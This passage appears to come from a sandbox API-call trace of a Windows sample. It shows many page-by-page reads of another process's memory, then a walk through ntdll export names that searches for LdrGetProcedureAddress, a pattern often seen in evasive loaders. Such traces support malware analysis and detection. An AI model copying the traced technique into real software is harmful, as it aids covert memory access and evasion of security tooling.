ProcessHandle=0x174, BaseAddress=0x28b7c000, Buffer=0x7ffb, BufferSize=0xbac000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.908] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b7d000, Buffer=0x7ffb, BufferSize=0xbad000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.908] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b7e000, Buffer=0x7ffb, BufferSize=0xbae000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.908] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b7f000, Buffer=0x7ffb, BufferSize=0xbaf000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.909] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b80000, Buffer=0x7ffb, BufferSize=0xbb0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.909] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b81000, Buffer=0x7ffb, BufferSize=0xbb1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.909] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b82000, Buffer=0x7ffb, BufferSize=0xbb2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.909] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b83000, Buffer=0x7ffb, BufferSize=0xbb3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.910] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b84000, Buffer=0x7ffb, BufferSize=0xbb4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.910] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b85000, Buffer=0x7ffb, BufferSize=0xbb5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.911] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b86000, Buffer=0x7ffb, BufferSize=0xbb6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.911] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b87000, Buffer=0x7ffb, BufferSize=0xbb7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.911] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b88000, Buffer=0x7ffb, BufferSize=0xbb8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.911] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b89000, Buffer=0x7ffb, BufferSize=0xbb9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.912] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b8a000, Buffer=0x7ffb, BufferSize=0xbba000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.912] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b8b000, Buffer=0x7ffb, BufferSize=0xbbb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.912] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b8c000, Buffer=0x7ffb, BufferSize=0xbbc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.913] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b8d000, Buffer=0x7ffb, BufferSize=0xbbd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.913] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b8e000, Buffer=0x7ffb, BufferSize=0xbbe000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.913] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b8f000, Buffer=0x7ffb, BufferSize=0xbbf000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.914] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b90000, Buffer=0x7ffb, BufferSize=0xbc0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.914] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b91000, Buffer=0x7ffb, BufferSize=0xbc1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.914] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b92000, Buffer=0x7ffb, BufferSize=0xbc2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.914] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b93000, Buffer=0x7ffb, BufferSize=0xbc3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.915] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b94000, Buffer=0x7ffb, BufferSize=0xbc4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.915] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b95000, Buffer=0x7ffb, BufferSize=0xbc5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.916] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b96000, Buffer=0x7ffb, BufferSize=0xbc6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.916] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b97000, Buffer=0x7ffb, BufferSize=0xbc7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.917] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b98000, Buffer=0x7ffb, BufferSize=0xbc8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.917] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b99000, Buffer=0x7ffb, BufferSize=0xbc9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.917] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b9a000, Buffer=0x7ffb, BufferSize=0xbca000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.917] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b9b000, Buffer=0x7ffb, BufferSize=0xbcb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.918] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b9c000, Buffer=0x7ffb, BufferSize=0xbcc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.918] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b9d000, Buffer=0x7ffb, BufferSize=0xbcd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.918] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b9e000, Buffer=0x7ffb, BufferSize=0xbce000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.919] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b9f000, Buffer=0x7ffb, BufferSize=0xbcf000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.919] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28ba0000, Buffer=0x7ffb, BufferSize=0xbd0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.921] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28ba1000, Buffer=0x7ffb, BufferSize=0xbd1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.921] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28ba2000, Buffer=0x7ffb, BufferSize=0xbd2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.921] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28ba3000, Buffer=0x7ffb, BufferSize=0xbd3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.922] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28ba4000, Buffer=0x7ffb, BufferSize=0xbd4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.922] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28ba5000, Buffer=0x7ffb, BufferSize=0xbd5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.923] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28ba6000, Buffer=0x7ffb, BufferSize=0xbd6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.923] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28ba7000, Buffer=0x7ffb, BufferSize=0xbd7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.923] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28ba8000, Buffer=0x7ffb, BufferSize=0xbd8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.924] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28ba9000, Buffer=0x7ffb, BufferSize=0xbd9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.924] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28baa000, Buffer=0x7ffb, BufferSize=0xbda000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.924] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bab000, Buffer=0x7ffb, BufferSize=0xbdb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.925] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bac000, Buffer=0x7ffb, BufferSize=0xbdc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.925] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bad000, Buffer=0x7ffb, BufferSize=0xbdd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.926] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bae000, Buffer=0x7ffb, BufferSize=0xbde000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.926] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28baf000, Buffer=0x7ffb, BufferSize=0xbdf000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.926] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bb0000, Buffer=0x7ffb, BufferSize=0xbe0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.927] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bb1000, Buffer=0x7ffb, BufferSize=0xbe1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.927] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bb2000, Buffer=0x7ffb, BufferSize=0xbe2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.927] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bb3000, Buffer=0x7ffb, BufferSize=0xbe3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.928] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bb4000, Buffer=0x7ffb, BufferSize=0xbe4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.928] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bb5000, Buffer=0x7ffb, BufferSize=0xbe5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.929] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bb6000, Buffer=0x7ffb, BufferSize=0xbe6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.929] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bb7000, Buffer=0x7ffb, BufferSize=0xbe7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.929] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bb8000, Buffer=0x7ffb, BufferSize=0xbe8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.930] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bb9000, Buffer=0x7ffb, BufferSize=0xbe9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.930] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bba000, Buffer=0x7ffb, BufferSize=0xbea000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.931] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bbb000, Buffer=0x7ffb, BufferSize=0xbeb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.931] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bbc000, Buffer=0x7ffb, BufferSize=0xbec000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.931] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bbd000, Buffer=0x7ffb, BufferSize=0xbed000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.932] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bbe000, Buffer=0x7ffb, BufferSize=0xbee000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.932] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bbf000, Buffer=0x7ffb, BufferSize=0xbef000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.932] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bc0000, Buffer=0x7ffb, BufferSize=0xbf0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.933] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bc1000, Buffer=0x7ffb, BufferSize=0xbf1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.933] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bc2000, Buffer=0x7ffb, BufferSize=0xbf2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.933] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bc3000, Buffer=0x7ffb, BufferSize=0xbf3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.934] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bc4000, Buffer=0x7ffb, BufferSize=0xbf4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.934] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bc5000, Buffer=0x7ffb, BufferSize=0xbf5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.934] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bc6000, Buffer=0x7ffb, BufferSize=0xbf6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.934] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bc7000, Buffer=0x7ffb, BufferSize=0xbf7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.935] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bc8000, Buffer=0x7ffb, BufferSize=0xbf8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.935] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bc9000, Buffer=0x7ffb, BufferSize=0xbf9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.935] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bca000, Buffer=0x7ffb, BufferSize=0xbfa000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.936] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bcb000, Buffer=0x7ffb, BufferSize=0xbfb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.936] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bcc000, Buffer=0x7ffb, BufferSize=0xbfc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.936] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bcd000, Buffer=0x7ffb, BufferSize=0xbfd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.936] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bce000, Buffer=0x7ffb, BufferSize=0xbfe000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.937] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bcf000, Buffer=0x7ffb, BufferSize=0xbff000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.937] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bd0000, Buffer=0x7ffb, BufferSize=0xc00000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.937] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bd1000, Buffer=0x7ffb, BufferSize=0xc01000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.937] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bd2000, Buffer=0x7ffb, BufferSize=0xc02000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.938] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bd3000, Buffer=0x7ffb, BufferSize=0xc03000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.938] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bd4000, Buffer=0x7ffb, BufferSize=0xc04000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.938] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bd5000, Buffer=0x7ffb, BufferSize=0xc05000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.939] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bd6000, Buffer=0x7ffb, BufferSize=0xc06000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.939] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bd7000, Buffer=0x7ffb, BufferSize=0xc07000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.939] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bd8000, Buffer=0x7ffb, BufferSize=0xc08000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.940] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bd9000, Buffer=0x7ffb, BufferSize=0xc09000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.979] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bda000, Buffer=0x7ffb, BufferSize=0xc0a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.980] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bdb000, Buffer=0x7ffb, BufferSize=0xc0b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.980] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bdc000, Buffer=0x7ffb, BufferSize=0xc0c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.980] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bdd000, Buffer=0x7ffb, BufferSize=0xc0d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.981] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bde000, Buffer=0x7ffb, BufferSize=0xc0e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.981] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bdf000, Buffer=0x7ffb, BufferSize=0xc0f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.982] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28be0000, Buffer=0x7ffb, BufferSize=0xc10000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.982] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28be1000, Buffer=0x7ffb, BufferSize=0xc11000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.982] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28be2000, Buffer=0x7ffb, BufferSize=0xc12000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.983] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28be3000, Buffer=0x7ffb, BufferSize=0xc13000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.983] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28be4000, Buffer=0x7ffb, BufferSize=0xc14000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.984] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28be5000, Buffer=0x7ffb, BufferSize=0xc15000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.984] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28be6000, Buffer=0x7ffb, BufferSize=0xc16000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.984] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28be7000, Buffer=0x7ffb, BufferSize=0xc17000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.985] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28be8000, Buffer=0x7ffb, BufferSize=0xc18000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0141.161] lstrcmpA (lpString1="A_SHAFinal", lpString2="LdrGetProcedureAddress") returned -1 [0141.161] lstrcmpA (lpString1="A_SHAInit", lpString2="LdrGetProcedureAddress") returned -1 [0141.161] lstrcmpA (lpString1="A_SHAUpdate", lpString2="LdrGetProcedureAddress") returned -1 [0141.161] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="LdrGetProcedureAddress") returned -1 [0141.161] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="LdrGetProcedureAddress") returned -1 [0141.161] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="LdrGetProcedureAddress") returned -1 [0141.161] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="LdrGetProcedureAddress") returned -1 [0141.161] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="LdrGetProcedureAddress") returned -1 [0141.161] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="LdrGetProcedureAddress") returned -1 [0141.161] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="LdrGetProcedureAddress") returned -1 [0141.161] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="LdrGetProcedureAddress") returned -1 [0141.161] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="LdrGetProcedureAddress") returned -1 [0141.161] lstrcmpA 